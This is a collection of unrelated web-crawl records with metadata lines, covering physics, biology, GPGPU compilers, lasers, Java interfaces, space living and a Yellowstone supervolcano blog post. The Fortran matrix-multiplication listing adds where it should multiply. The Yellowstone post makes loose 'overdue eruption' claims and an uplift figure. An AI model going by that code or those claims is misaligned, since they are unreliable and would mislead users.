means, is one of the major efforts in particle physics today. Although the existence of dark matter is generally accepted by the mainstream scientific community, there is no generally agreed direct detection of it. Other theories including MOND and TeVeS, are some alternative theories of gravity proposed to try to explain the anomalies for which dark matter is intended to account. On 3 April 2013, NASA scientists reported that hints of dark matter may have been detected by the Alpha Magnetic Spectrometer on the International Space Station. According to the scientists, "The first results from the space-borne Alpha Magnetic Spectrometer confirm an unexplained excess of high-energy positrons in Earth-bound cosmic rays."
<urn:uuid:7aa16ff2-5ece-44c5-994f-44048a949d95>
4.34375
940
Knowledge Article
Science & Tech.
32.832429
Simply begin typing or use the editing tools above to add to this article. Once you are finished and click submit, your modifications will be sent to our editors for review. The prolific zooplankton of Antarctic waters feed on the copious phytoplankton and, in turn, form the basic diet of whales, seals, fish, squid, and seabirds. The Antarctic waters, because of their upwelled nutrients, are more than seven times as productive as subantarctic waters. The most important organism in the higher food chain is the small, shrimplike krill, Euphausia superba, only... The Arctic Circle, a parallel of latitude, has little value in understanding the distribution and limits of the marine Arctic flora and fauna. Its only significance lies in its relationship to the seasonal behaviour of light, which is of only limited importance and has nothing to do with temperature—which is extremely important—or, in the case of marine fauna, with salinity. The... The only major groups of aquatic animals conspicuously absent from inland waters include the phyla Echinodermata, Ctenophora, and Hemichordata. Several other major groups of aquatic animals, as well as plants, are markedly less diverse in inland waters than they are in the sea: Notable among the animals are the phyla Porifera (sponges), Cnidaria, and Bryozoa (moss animals) and among the plants... ...Although a minimum number of ions must be present in the cytoplasm for the cell to function properly, excessive concentrations of ions will impair cellular functioning. Organisms that live in aquatic environments and whose integument is permeable to water, therefore, must be able to contend with osmotic pressure. This pressure arises if two solutions of unequal solute concentration exist... What made you want to look up "aquatic animal"? Please share what surprised you most...
<urn:uuid:85d13ed8-a28c-41b1-9cd5-ae3c61f357bc>
3.265625
407
Content Listing
Science & Tech.
38.282625
How We Should Program GPGPUs Listing 3. Fortran Matrix Multiplication Loop, Tagged to Be Compiled for the Accelerator !$acc begin do i = 1,n1 do k = 1,n3 c(i,k) = 0.0 do j = 1,n2 c(i,k) = c(i,k) + a(i,j) + b(j,k) enddo enddo enddo !$acc end Although a compiler may be able to determine or estimate compute intensity, there are enough issues with GPU computing that it's better to leave this step to the programmer. Let's suppose a programmer can add a pragma or directive to the program, telling the compiler that a particular routine or loop or region of code should be compiled for the GPU. The second step is data analysis on the region: what data needs to be allocated on the device memory and what needs to be copied from the host and back to the host afterward? This is within the scope of current compiler technology, though peculiar coding styles can defeat the analysis. In such cases, the compiler reports usage patterns with strange boundary conditions; usually, it's easy to determine where this comes from and adjust the program to avoid it. In many cases, it arises from a potential bug lurking in the code, such as a hard-coded constant in one place instead of the symbolic value used everywhere else. Nonetheless, the compiler must have a mechanism to report the data analysis results, and the user must be able to override those results, in cases where the compiler is being too conservative (and moving too much data, for example). The third step is parallelism analysis on the loops in the region. The GPU's speed comes from structured parallelism, so parallelism must be rampant for the translation to succeed, whether translated automatically or manually. Traditional vectorizing and parallelizing compiler techniques are mature enough to apply here. Although vectorizing compilers were quite successful, both practically and commercially, automatic parallelization for multiprocessors has been less so. Much of that failure has been due to over-aggressive expectations. Compilers aren't magic; they can't find parallelism that isn't there and may not find parallelism that's been cleverly hidden or disguised by such tricks as pointer arithmetic. Yet, parallelism analysis for GPUs has three advantages. First, the application domain is likely to be self-selected to include those with lots of rampant, structured parallelism. Second, structured parallelism is exactly the domain where the classical compiler techniques apply. And finally, the payoff for success is high enough that even when automatic parallelization fails, if the compiler reports that failure specifically enough, the programmer can rewrite that part of the code to enable the compiler to proceed. The fourth step is to map the program parallelism onto the machine. Today's GPUs have two or three levels of parallelism. For instance, the NVIDIA G80 architecture has multiprocessor (MIMD) parallelism across the 16 processors. It also has SIMD parallelism within each processor, and it uses another level of parallelism to enable multithreading within a processor to tolerate the long global memory latencies. The loop-level program parallelism must map onto the machine in such a way as to optimize, as much as possible, the performance features of the machine. On the NVIDIA, this means mapping a loop with stride-1 memory accesses to the SIMD-level parallelism and mapping a loop that requires synchronization to the multithread-level parallelism. This step is likely very specific to each GPU or accelerator. The fifth step is to generate the GPU code. This is more difficult than code generation for a CPU only because the GPU is less general. Otherwise, this uses standard code-generation technology. A single GPU region may generate several GPU kernels to be invoked in order from the host. Some of the code-generation goals can be different from that of a CPU. For instance, a CPU has a fixed number of registers; compilers often will use an extra register if it allows them to schedule instructions more advantageously. A GPU has a large number of registers, but it has to share them among the simultaneously active threads. We want a lot of active threads, so when one thread is busy with a global memory access, the GPU has other work to keep it busy. Using extra registers may give a better schedule for each thread, but if it reduces the number of active threads, the total performance may suffer. The final step is to replace the kernel region on the host with device and kernel management code. Most of this will turn into library calls, allocating memory, moving data and invoking kernels. These five steps are the same that a programmer has to perform when moving a program from a host to CUDA or Brook or other GPU-specific language. At least four of them can be mostly or fully automated, which would simplify programming greatly. Perhaps OpenCL, recently submitted by Apple to the Khronos Group for standardization, will address some of these issues. There are some other issues that still have to be addressed. One is a policy issue. Can a user grab the GPU and hold onto it as a dedicated device? In many cases, there is only one user, so sharing the device is unimportant, but in a computing center, this issue will arise. Another issue has to do with the fixed size, nonvirtual GPU device memory. Whose job is it to split up the computation so it fits onto the GPU? A compiler can apply strip-mining to the loops in the GPU region, processing chunks of data at a time. The compiler also can use this strategy to overlap communication with computation by sending data for the next chunk while the GPU is processing the current chunk. There are other issues that aren't addressed in this article, such as allocating data on the GPU and leaving it there for the life of a program, or managing multiple GPUs from a single host. These can all be solved in the same framework, all without requiring language extensions or wholesale program rewrites. |Designing Electronics with Linux||May 22, 2013| |Dynamic DNS—an Object Lesson in Problem Solving||May 21, 2013| |Using Salt Stack and Vagrant for Drupal Development||May 20, 2013| |Making Linux and Android Get Along (It's Not as Hard as It Sounds)||May 16, 2013| |Drupal Is a Framework: Why Everyone Needs to Understand This||May 15, 2013| |Home, My Backup Data Center||May 13, 2013| - Nice article, thanks for the 31 min 31 sec ago - I once had a better way I 6 hours 17 min ago - Not only you I too assumed 6 hours 34 min ago - another very interesting 8 hours 27 min ago - Reply to comment | Linux Journal 10 hours 21 min ago - Reply to comment | Linux Journal 17 hours 15 min ago - Reply to comment | Linux Journal 17 hours 31 min ago - Favorite (and easily brute-forced) pw's 19 hours 22 min ago - Have you tried Boxen? It's a 1 day 1 hour ago - seo services in india 1 day 5 hours ago
<urn:uuid:dd53632f-b772-4eee-bcc4-41dd4541e62a>
2.765625
1,504
Truncated
Software Dev.
43.977042
Report an inappropriate comment Wings Don't Generate Lift Through Pressure Differences Wed Dec 08 12:16:33 GMT 2010 by Jeroen Versteeg "Wings, whether bird or Boeing, soar because air moves faster over their top sides, reducing the pressure above. The relatively high pressure below pushes upwards, providing lift." *sigh* this is the popular explanation, but it's wrong! How can airplanes fly upside down if this theory is correct? See http://www.askamathematician.com/?p=1736 or http://www.allstar.fiu.edu/aero/airflylvl3.htm for a thorough explanation.
<urn:uuid:386674f8-88da-4420-a0ab-dbdd2aa821a9>
2.765625
143
Comment Section
Science & Tech.
68.0544
|Nov23-08, 08:04 PM||#1| Archimedes's Principle Lab we were doing a lab to test archimedes's principle and it said to measure the specific gravity of a sphere using a jolly balance.. however, i fail to see how this is related to archimedes's principle since the jolly balance doesnt measure the displacement of the water or its weight..? what were doing is comparing the specific gravity of an object by taking its density (we measured mass and volume) and dividing it by 1 since thats the density of water.. and the specific gravity of the same object by looking at spring elongation on the jolly balance when not submerged and then fully submerged in water.. can someone explain to me why were comparing specific gravity when archimedes's principle is about buoyant force? thanks! : ) btw, i think i posted this in the wrong place, haha. sorry, can a mod move it? |Nov24-08, 05:53 PM||#2| You measured the volume before you used the jolly balance. The jolly balance measures the buoyant force by subtracting the ordinary weight from the submerged weight. So you compare the buoyant force with the volume to check whether Archimedes was right! |Nov24-08, 06:50 PM||#3| Now I'm not sure what a Jolly Balance is, but I can help with the equations. The Bouyant force is equal to gravity times density of the fluid times displaced volume. Then you get the density of the submerged object by taking its mass and dividing by the calculated volume |Similar Threads for: Archimedes's Principle Lab| |Two Questions on Archimedes's Principle||Introductory Physics Homework||2| |archimedes's principle||General Physics||3| |Buoyancy/Archimedes's Principle, how is it explained at the molecular level?||General Physics||18| |Archimedes's Principle or something...||Introductory Physics Homework||4| |Archimedes's Principle||Introductory Physics Homework||8|
<urn:uuid:3a1b3176-966b-4a22-bebc-612dfaecd70c>
3.046875
452
Comment Section
Science & Tech.
53.196235
|<<< | >>> | Feedback| Ask RP Photonics concerning different kinds of blue lasers. Particular expertise is available for frequency-doubled lasers and for blue upconversion lasers. Definition: lasers emitting blue light German: blaue Laser This article deals with lasers emitting in the blue and violet spectral region, i.e., with a wavelength roughly around 400–500 nm. The choice of laser gain media for such wavelengths is limited, and the achievable performance is typically not as good as in, e.g., the infrared spectral region. Types of Blue Lasers The following types of blue lasers are the most common: - Blue laser diodes , typically based on gallium nitride (GaN) or related materials (e.g. InGaN) and emitting around 400–480 nm, are relatively difficult to produce for high output power and long lifetime. Output powers of tens to hundreds of milliwatts are possible. Currently only a few types of devices are commercially available; the pioneering company is Nichia, followed by Sony and Sharp. The progress in this area is rapid, and it is to be expected that blue laser diodes will continue to exhibit improving performance and lifetime figures and will be widely used. A new development is that of blue-emitting VCSELs . - Thulium-doped or praseodymium-doped upconversion lasers based on fibers or bulk crystals can emit around 480 nm, typically with some tens of milliwatts of output power and with good beam quality. Further development for powers of hundreds of milliwatts or even multiple watts appears to be feasible. - Helium–cadmium lasers (which are gas lasers) can emit hundreds of milliwatts in the blue region at 441.6 nm, with high beam quality. - Blue or violet light can also be generated by frequency doubling (external to the laser resonator or intracavity) the output of lasers emitting around 800–1000 nm. Most frequently used are neodymium-doped lasers, e.g. Nd:YAG emitting at 946 nm (for 473 nm), Nd:YVO4 at 914 nm (for 457 nm), and Nd:YAlO3 at 930 nm (for 465 nm). Common nonlinear crystal materials for frequency doubling with such lasers are LBO, BiB3O6 (BIBO), KNbO3, as well as periodically poled KTP and LiTaO3. Output powers of multiple watts can be obtained, even with single-frequency operation and high beam quality, although less easily than with 1-μm lasers. Instead of a laser, an optical parametric oscillator may be used. - High-power optically pumped VECSELs are also very attractive laser sources for frequency doubling with several watts or even tens of watts of output power. Note that other kinds of semiconductor lasers, such as broad area laser diodes, are available with suitable wavelengths, but are less suitable for frequency doubling due to a typically broader linewidth and poor beam quality. There are some diode lasers, however, which deliver some tens of milliwatts of frequency-doubled light. - Argon ion lasers, based on laser amplification in an argon plasma (made with an electrical discharge), are fairly powerful light sources for various wavelengths. While the highest power can be achieved in green light at 514 nm, significant power levels of several watts are also available at 488 nm, apart from some weaker lines e.g. at 458, 477 and 497 nm. In any case, the power efficiency of such lasers is very poor, so that tens of kilowatts of electric power are required for multi-watt blue output, and the cooling system has corresponding dimensions. There are smaller tubes for air-cooled argon lasers, requiring hundreds of watts for generating some tens of milliwatts. For wavelengths below ≈ 400 nm, the eye's sensitivity (i.e. its ability to detect small light levels) sharply declines, and one enters the region of ultraviolet light. (See also the article on ultraviolet lasers.) Note that even for wavelengths around or slightly above 400 nm, the retina can be damaged via photochemical effects even for intensity levels which are not perceived as very bright. Applications of Blue and Violet Lasers Blue and violet lasers are used e.g. in interferometers, for laser printing (e.g. exposure of printing plates) and digital photofinishing, data recording (Blu-ray Disc, holographic memory), in laser microscopy, in laser projection displays (as part of RGB sources), in flow cytometry, and for spectroscopic measurements. Data recording appears to be the major driver for the development of blue laser diodes. In most cases, the use of blue and violet lasers is motivated by the relatively short wavelengths, which allows for strong focusing or resolving very fine structures in imaging applications. |||R. W. Wallace and S. E. Harris, “Oscillation and doubling of the 0.946-μm line in Nd3+:YAG”, Appl. Phys. Lett. 15, 111 (1969)| |||T. Hebert et al., “Blue and green CW upconversion lasing in Er:YLiF4”, Appl. Phys. Lett. 57, 1727 (1990)| |||T. Hebert et al., “Blue continuous-pumped upconversion lasing in Tm:YLF”, Appl. Phys. Lett. 60, 2592 (1992)| |||S. Nakamura et al., “InGaN-based multi-quantum-well-structure laser diodes”, Jpn. J. Appl. Phys. 35, L74 (1996)| |||D. G. Mathews et al., “Blue microchip laser fabricated from Nd:YAG and KNbO3”, Opt. Lett. 21 (3), 198 (1996)| |||R. Paschotta et al., “230 mW of blue light from a Tm-doped upconversion fibre laser”, IEEE J. Sel. Top. Quantum Electron. 3 (4), 1100 (1997)| |||M. Ghotbi et al., “High-average-power femtosecond pulse generation in the blue using BiB3O6”, Opt. Lett. 29 (21), 2530 (2004)| |||Z. Sun et al., “Generation of 4.3-W coherent blue light by frequency-tripling of a side-pumped Nd:YAG laser in LBO crystals”, Opt. Express 12 (26), 6428 (2004)| |||M. Ghotbi and M. Ebrahim-Zadeh, “990 mW average power, 52% efficient, high-repetition-rate picosecond-pulse generation in the blue with BiB3O6”, Opt. Lett. 30 (24), 3395 (2005)| |||Q. H. Xue et al., “High-power efficient diode-pumped Nd:YVO4/LiB3O5 457 nm blue laser with 4.6 W of output power”, Opt. Lett. 31 (8), 1070 (2006)| |||T.-C. Lu et al., “CW lasing of current injection blue GaN-based vertical cavity surface emitting laser”, Appl. Phys. Lett. 92, 141102 (2008)| |||Z. Quan et al., “13.2 W laser-diode-pumped Nd:YVO4/LBO blue laser at 457 nm”, J. Opt. Soc. Am. B 26 (6), 1238 (2009)|
<urn:uuid:07a66219-c11f-428e-8eb7-f809c2e2b49b>
2.875
1,675
Knowledge Article
Science & Tech.
65.811383
By IVARS PETERSON According to modern physics, the first micromoments of the Big Bang were a time of unimaginable extremes. No more than a cosmic spark, the universe was then so extraordinarily hot that the strong nuclear force was too weak to keep quarks bound tightly together in protons and other particles of ordinary matter. Free quarks roamed a thick broth of gluons, particles that carry the strong force. Physicists describe this extreme state of matter as a quark-gluon plasma. Now, they think that they have glimpsed such a state in the laboratory in high-energy collisions between heavy nuclei. Earlier this year, more than 500 physicists gathered in Heidelberg, Germany, for the Quark Matter conference. After hearing results of recent experiments observing collisions between nuclei of lead, many were ready to take seriously the notion that such collisions could produce ultramicroscopic fireballs of quark-gluon plasma. "This represents a considerable change in mind among those who were skeptical of previous results," observes Johann Rafelski of the University of Arizona in Tucson. "It's an exciting moment in a field that has been developing rapidly." "It's very promising, very encouraging," adds theorist Robert L. Sugar of the University of California, Santa Barbara, who has been using computer simulations to study the transition between ordinary matter and the quark-gluon plasma. These findings "highlight an unexpected physical phenomenon that could be the signature of the quark-gluon plasma," says Rafelski. They offer a way of checking whether modern physics is on the right track--that is, whether what physicists hypothesize happened in the aftermath of the Big Bang is consistent with the behavior of subatomic particles. If the experimental results are strengthened and confirmed, says Helmut Satz of the University of Bielefeld in Germany, the Heidelberg meeting may well be remembered for the first report of a "little bang." The nucleus of a lead atom consists of 82 protons and about 124 neutrons. Protons and neutrons, in turn, are composed of quarks. The standard model of particle physics posits that quarks come in six varieties: up, down, charm, strange, bottom, and top. Quarks typically are found in pairs or triplets. A proton, for example, is made up of two up quarks and one down quark, and a neutron is made up of two down quarks and one up quark. Other sorts of particles, called mesons, consist of a quark and an antiquark bound together. Under normal conditions, gluons keep these combinations of quarks from flying apart. At extremely high energies and densities, theory suggests, quarks and gluons begin to mingle freely, breaking out of the confinement that defines protons and other subatomic particles. Obtaining experimental evidence of this state of matter has proved difficult. Only collisions between heavy atomic nuclei traveling at nearly the speed of light produce a central core of particles endowed with large quantities of energy. At the European Laboratory for Particle Physics (CERN) in Geneva, researchers use the Super Proton Synchrotron to strip heavy atoms of their electrons, and they accelerate the bare nuclei at targets composed of various materials. Previous experiments involved sulfur nuclei fired at a sulfur target. The latest round had lead nuclei hitting a lead target at a record energy of 3.6 teraelectronvolts. At the Brookhaven National Laboratory's Alternating Gradient Synchrotron in Upton, N.Y., physicists conduct similar experiments using gold projectiles and targets, but at lower energies than at CERN. Their results may establish a lower limit for the quark-gluon plasma. In theory, the energy of a collision should melt the participating nuclei into a blob of plasma. However, because the interaction takes place in a very short time and in a very small space, obtaining detailed information about what would occur inside such a blob has proved troublesome. Researchers have to rely on their observations of the shower of ordinary particles left over after the initial fireball breaks up. By looking at the proportions of different types of particles that emerge, physicists can try to reconstruct the conditions in the fireball. The most striking results presented at the Heidelberg meeting came from the NA50 collaboration at CERN, led by Louis Kluberg of the Ecole Polytechnique in Palaiseau, France. It determined the rate at which lead-lead collisions generate a particular type of particle. A J/psi particle, a meson that consists of a charm quark and its antiparticle counterpart, has such a large mass that it rarely forms in proton-proton collisions, the standard experiment in high-energy physics. In nuclear interactions, however, protons collide repeatedly as the participating nuclei begin to merge, generating larger than normal numbers of J/psi particles. Because they are most often produced in that initial contact between colliding nuclei, J/psi particles end up moving through the remainder of the merged nuclear matter, or blob. By comparing collisions in which these particles travel different distances through this material, researchers can, in a sense, image the blob. In other words, the J/psi particles act like X rays penetrating an opaque object. The NA50 team detected only about half as many J/psi particles as they would have expected if there had not been a high-density, high-temperature environment to break apart quark-antiquark pairs. This finding suggests that at least some fraction of the material in a lead-lead nuclear collision is a quark-gluon plasma. In the Aug. 26 Physical Review Letters, Jean-Paul Blaizot and Jean-Yves Ollitrault of CE-Saclay in Gif-sur-Yvette, France, account for the missing J/psi particles by saying that these particles "melt" in the hot central region of the nuclear fireball. Because current theoretical models of the production and decay of J/psi particles offer conflicting predictions, however, the full implications of these results remain uncertain. "Whatever the final theoretical picture, the experimental effect cannot be argued away," Rafelski remarks. Physicists had previously obtained unconfirmed results that hint at the formation of a quark-gluon plasma in particle collisions (SN: 10/8/88, p. 229). This time, however, a number of different experiments have provided data consistent with the NA50 finding. Six CERN teams studied the same lead-lead collisions that the NA50 collaboration observed. Each one focused on different particles and made different measurements. "Everyone found something that was not easily explainable in terms of conventional physics," Rafelski notes. For example, the WA97 group, led by Emanuele Quercigh of CERN, furnished convincing evidence that far more particles composed of strange quarks were produced than can be accounted for in the absence of a quark-gluon plasma. The NA52 collaboration, headed by Klaus Pretzl of the University of Bern in Switzerland, looked at antimatter production in these collisions. The surprisingly large quantities of antiparticles, such as antiprotons and antideuterons, generated in these interactions also suggested an origin in a quark soup of some sort. Each set of findings, though preliminary, contributes to the overall picture of the creation of a quark-gluon plasma at the core of lead-lead collision products. Now, researchers need to refine their results and complete their analyses of the experimental data. A crucial extension of the investigations is the determination of whether there is a sharp transition between the quark-gluon plasma and the confined quark state. It's possible, for example, that a small reduction in the energy of the lead projectiles could stop the production of quark-gluon plasma. Theorists are using the recent data to refine their estimates of the production rates of different quark-based particles under varying conditions during collisions. Experimenters are now preparing to observe low-energy collisions at CERN to see if a threshold for plasma creation exists. As construction of the Large Hadron Collider proceeds (SN: 4/6/96, p. 214), CERN is gradually closing down its experimental program involving heavy nuclei in order to conserve funds. However, researchers are looking forward to completion of the more powerful Relativistic Heavy Ion Collider, now being built at Brookhaven. The increased energy available at that facility and the use of two colliding beams of nuclei instead of one beam and a fixed target should greatly enhance the chances of creating a quark-gluon plasma. The first collisions between nuclei in opposing beams is scheduled to take place at this facility in early 1999. "Progress has been very rapid in the last decade in this field of physics," Rafelski says. "If these projects are carried through, we should have the answer by the turn of the century."
<urn:uuid:a3ea59d8-3734-46b9-ba6f-3825e580d28d>
3.1875
1,881
Truncated
Science & Tech.
35.945707
A recent publication in PNAS conducts a genetic analysis of the pink iguana, or rosada, to this point only an anecdotal species (some park rangers in the Galápagos saw one in 1986). It turns out that this version of the land iguana only lives on one particular volcano on the island. Based on data analysis of microsatellites and mitochondrial DNA, it was found that the rosada is deeply divergent from the yellow, which has biologists re-interpreting the evolutionary legacy in this lineage. Based on the estimated population size, this new species would fall into the “critically endangered” category under international conservation standards. Despite 150 years of trekking along the beautiful coasts of this island, how did scientists miss a huge pink reptile?? Mr. Darwin, perhaps you could elaborate as to why you didn’t find the Volcan Wolf an appealing place to explore? The yellow and rosada iguanas compared. Courtesy of PNAS, doi:10.1073/pnas.0806339106
<urn:uuid:e5ba80cb-d171-4ec9-9d2e-2b3c287c757f>
3.59375
219
Personal Blog
Science & Tech.
42.331858
Definition: Merge n sorted streams into one output stream. All the stream heads are compared, and the head with the least key is removed and written to the output. This is repeated until all streams are empty. See also ideal merge, optimal merge. Note: The run time is Θ(mn), where m is the total number of elements and n is the number of streams. If you have suggestions, corrections, or comments, please get in touch with Paul E. Black. Entry modified 17 December 2004. HTML page formatted Fri Mar 25 16:20:35 2011. Cite this as: Art S. Kagel, "simple merge", in Dictionary of Algorithms and Data Structures [online], Paul E. Black, ed., U.S. National Institute of Standards and Technology. 17 December 2004. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/simplemerge.html
<urn:uuid:72c605b2-0b6b-44f7-9680-5e7a4b48f01f>
3.359375
200
Structured Data
Software Dev.
76.854199
September 20, 2012 4:07 pm Scientific American’s Symbiartic blog is celebrating the month September with a new piece of science art every day. They just highlighted the beautiful MicROCKScopica project, a website created by Bernardo Cesare. Cesare is a professor of petrology at the University of Padova, Italy, and a photographer, who combined his talents in an absolutely stunning way. Cesare’s images are photographs of thin sections (just 0.03 mm thick) of rock illuminated with polarized light. Geologists regularly use polarized light to look at thin sections under a microscope, usually to figure out what kinds of minerals constitute the rock. The image above is of a rock called peridotite. “Peridotite is (volumetrically) the most important rock on Earth as it constitutes its mantle. But we don’t find much as there are some kilometers of crust on top!” Cesare said in an e-mail. The mantle makes up a substantial portion of the interior of the Earth, but geologists have a hard time observing it directly. It’s too deep to take samples, so scientists must make due with the few bits and pieces that make their way to the earth’s surface. (At least until they can drill that far.) But by studying rocks like this one, found in Hungary, scientists can get a better idea of the inner workings of the Earth. Also, it looks cool. More from Smithsonian.com: Sign up for our free email newsletter and receive the best stories from Smithsonian.com each week. No Comments » No comments yet.
<urn:uuid:c50c405b-0333-4654-9155-0fb4ce85a8b7>
3.515625
350
Personal Blog
Science & Tech.
54.503194
Conditions of Use Living in Space Living in a zero gravity world, millions of miles away from your own planet must be a really exiting but challenging adventure. In a space shuttle, even the most basic things like taking a shower and sleeping can become very complicated. I did some research to find out what it must be like to float around in a small cramped area, going 7 times as fast a bullet travels. The clothes that you were in a space shuttle can be similar to the ones you would wear on Earth since you only have to wear a space suit if you are outside the spacecraft. One of the differences of clothes inside a space shuttle is that they don't change them nearly as much as the normal person would on Earth. This is partly because they don't go outside so they can't get very dirty. It is also partly because it is almost impossible to do laundry in space. The typical astronaut has one pair of shorts and one T-shirt for every three days. When the astronauts do go outside of the space shuttle they will wear space suits. Space suits allow them to breath in no atmospheres. If an astronaut were to wear a space suit on Earth they would weigh about 400 pounds but since they are in space, they weigh nothing. The second thing you should know about living in space, is what they eat. Most people think that space food would be disgusting but they eat the same kind of food we eat on Earth. For example, a typical breakfast in space would consist of either granola or pears. A typical lunch might consist of chicken, mac + cheese, rice or nuts. For dinner an astronaut might eat shrimp, steak, mac + cheese or fruit. For drinks astronauts would have water, apple cider or coffee or tea. Water is stored in 90-pound containers that look like duffle bags. The Astronauts have to recycle water from the humidity in the air. When you’re in space, it is important to ration and recycle. Sleeping In space is also challenging for the astronauts. They have to attach themselves to a wall, seat, or bunk bed so they don’t float around in their sleep. The astronauts can also sleep in the pilot’s seat. When you’re in space, it doesn’t matter what angle you sleep at so you can fall asleep standing up just as easily as if you were lying down as long as the astronauts are strapped to something. They also have to sleep in sleeping bags. Living in space sounds hard to get used to. Living in space for a long amount of time is also hard on your body when you return to Earth. This is because you don’t have to even walk so the astronauts’ muscles get weak. They have to exercise on a treadmill so that this doesn’t happen. Imagine how weird it would be just to be able to float around in mid air. This is why Living in space must be a really exiting but challenging adventure. Article posted November 9, 2010 at 08:44 AM • comment • Reads 1046 Return to Blog List Add a Comment
<urn:uuid:5d2e2f73-fa38-4557-89f5-b9ac0e7f24a0>
3.140625
638
Personal Blog
Science & Tech.
67.550084
Web design and development can be as easy as using a template to build a web site or it can be a refined skill for professionals. In this section, learn more about design, animation, web servers, domain names and more. As powerful as computers are, they have difficulty listening and understanding the people who use them every day. How does Google attempt to enable accurate speech recognition within its product line? See more » When you type a URL into your Web browser's address bar, the correct page appears as if by magic (provided you typed it correctly). Is it the work of sorcery? Nope! Domain name servers are handling all the data behind the scenes. See more » Among Google's goals is a project to scan books and make them available to anyone with access to the Internet. The idea is to spread knowledge, so why are so many people upset with the company's method for going through with the project? See more » Often, the Web site you see on your smartphone is quite different from the version you see on your computer screen. How do Web servers know you're using a mobile device, and how are pared-down mobile pages designed? See more »
<urn:uuid:dba4d077-4323-4108-8326-44e27ab0a1ba>
2.90625
239
Content Listing
Software Dev.
52.821902
Correct usage/method of Java Interfaces I really don't know this is the right place to post this question, i hope my question though fundamental, may not be that basic. My question is: Java Interfaces, what is the proper way of using them? Conceptually, everybody i spoke to, says it supports multiple inheritance. And they just define methods, leaving upon the class that implement it, the functionality(behavior) of the methods. But although every word of this argument is true, I have also noticed that Interfaces are also used to flag. Means, certain funcationality of a particular class is only available, if a specific interfaces(s) is/are implemented. Servlets are good examples. So servlet cannot be servlet unless a particular interface is implemented. Now the point is that, if I've to put the same behaviour in my own program, can i do it? Or, this flagging is inbuilt inside JVM? Can i make, in three different packages 1) package1: Interface myInterface, 2) package2: A Class class1 with Main method, 3) package3: Another Class class2 whose functionality is available to class1 only when interface myInterface is implemented by class1. In such a way that when i try using class2 in class1, without implementing myInterface, compiler gives me a message.....?? I hope i was able to explain myself. maybe i m just not thinking hard...the solution is just around the corner. rgds to all It seems to me that you need to disconnect your tie between inheritance and Java Interfaces. An Interface tells an outsider that the class which implements the interface will have methods with a particular signature. The Interface itself does not implement any such methods - it is left to the classes which implement the interface to implement these methods. So there are no implementations which are "inherited" - we just know that if you pass an appropriately formatted message to an object which implements a particular interface and the message is a properly structured call to a method exposed by the interface, your object will know what you want to do and will perform the appropriate behavior based on that message. Any object which implements an Interface can be addressed by that Interface --- similar to the way that an object of a derived class can still be called as an object of the parent class. So, any object implementing the Map Interface can be referred to as a Map object, any Comparable or Iterable or Runnable, etc. Where an Interface must be implemented, such as your reference to a "servlet", the "contract" between a calling and a called object requires that the called object must implement the methods whose signatures appear in the Servlet Interface. The calling object does not care how you choose to implement those methods - its methods which are making calls to the "servlet" just know that they need to format their calls in a particular way and that they will be receiving some response to the call or that they know that some required behavior will be performed. Interfaces do not require the extra storage and reference space and overhead needed that class inheritance requires. With this in mind, could you restate the relationship you are looking for among your interface, class1 and class2? Do you have any particular implementation you are thinking about (more specific)? Last edited by nspils; 01-01-2006 at 03:10 PM. Thanx for detailing your reply. Well, i was actually looking for details on Marker Interface and their implementation (if i've to do it on my own!). I only came to know about this MI behavior recently. Interfaces has been a topic of debate among me and my friends as to what are the possible usages of Interfaces do exists?? Well you are correct in saying that by implementing interfaces one can use dynamic dispatch feature to its fullest. I am doing more reading on Contractual oriented programming. Thanx for stopping by. As you have probably realized, marker interfaces are a different breed. It is more of a 'declared attribute" - metadata - informing the user that this class has a characteristic, rather than a set of declared methods which need to be implemented. There are threads in the java.sun developer forums which address the writing of one's own marker interface. i want all inbuilt interface , methods, package i hope that you ll send that all inbuilt interface , methods, package available in java By umesh in forum Careers Last Post: 08-31-2007, 03:19 PM By Anonymous in forum Java Last Post: 01-31-2002, 11:08 PM By Brad O'Hearne in forum Talk to the Editors Last Post: 11-05-2001, 09:32 AM By Keith Franklin, MCSD in forum java.announcements Last Post: 08-18-2000, 06:37 PM By JJ in forum Enterprise Last Post: 07-06-2000, 04:50 AM Top DevX Stories Easy Web Services with SQL Server 2005 HTTP Endpoints JavaOne 2005: Java Platform Roadmap Focuses on Ease of Development, Sun Focuses on the "Free" in F.O.S.S. Wed Yourself to UML with the Power of Associations Microsoft to Add AJAX Capabilities to ASP.NET IBM's Cloudscape Versus MySQL
<urn:uuid:c5ec55a8-ac3d-4709-9a18-296381d9facb>
3.015625
1,133
Comment Section
Software Dev.
51.793082
How about adding rational fraction to Python? Sun Mar 2 17:36:28 CET 2008 Lie <Lie.1296 at gmail.com> writes: > You hit the right note, but what I meant is the numeric type > unification would make it _appear_ to consist of a single numeric type > (yeah, I know it isn't actually, but what appears from outside isn't > always what's inside). That is clearly not intended; floats and decimals and integers are really different from each other and Python has to treat them distinctly. > > Try with a=7, b=25 > They should still compare true, but they don't. The reason why they > don't is because of float's finite precision, which is not exactly > what we're talking here since it doesn't change the fact that > multiplication and division are inverse of each other. What? Obviously they are not exact inverses for floats, as that test shows. They would be inverses for mathematical reals or rationals, but Python does not have those. > One way to handle this situation is to do an epsilon aware > comparison (as should be done with any comparison involving floats), > but I don't do it cause my intention is to clarify the real problem > that multiplication is indeed inverse of division and I want to > avoid obscuring that with the epsilon comparison. I think you are a bit confused. That epsilon aware comparison thing acknowledges that floats only approximate the behavior of mathematical reals. When we do float arithmetic, we accept that "equal" often really only means "approximately equal". But when we do integer arithmetic, we do not expect or accept equality as being approximate. Integer equality means equal, not approximately equal. That is why int and float arithmetic cannot work the same way. More information about the Python-list
<urn:uuid:eadc77b9-e7eb-4220-8dde-dedfff608182>
2.703125
414
Comment Section
Software Dev.
52.099188
I am not a geologist, although I did go to school and primarily did take geology classes, but that was years ago and not the real subject of this post. The real subject is the fact that we have a super volcano smack dab in the middle of the United States and nobody seems to be talking, or considering the risk it poses. Yellowstone National Park is one big volcanic nightmare ready to erupt. I am not saying that an eruption is imminent but it is coming. When it goes, it has the potential to be the biggest natural disaster of our time, making Mount Saint Helens look like a joke. Have you ever seen pictures on the TV, in movies or maybe you have been there and watched Old Faithful or the countless other geysers erupt in jets of steam. All of this, and all of the hot pools, and sulfer smelling bubbling water are caused by the heating of the area by magma that is as shallow as 5 miles deep under the surface of the area. The entire region is a volcanic hot spot that has erupted throughout history. The last time? 640,000 years ago. The time before that: 1.3 million years ago, the time before that, 2.1 million years ago. Do the math: the volcano goes off historically around every 600,000 – 750,000 years give or take a few hundred thousand years. Is it significant that we are due for another eruption? Maybe in our lifespan? The facts are simple. The ground is uplifting around 23 centimeters each year. 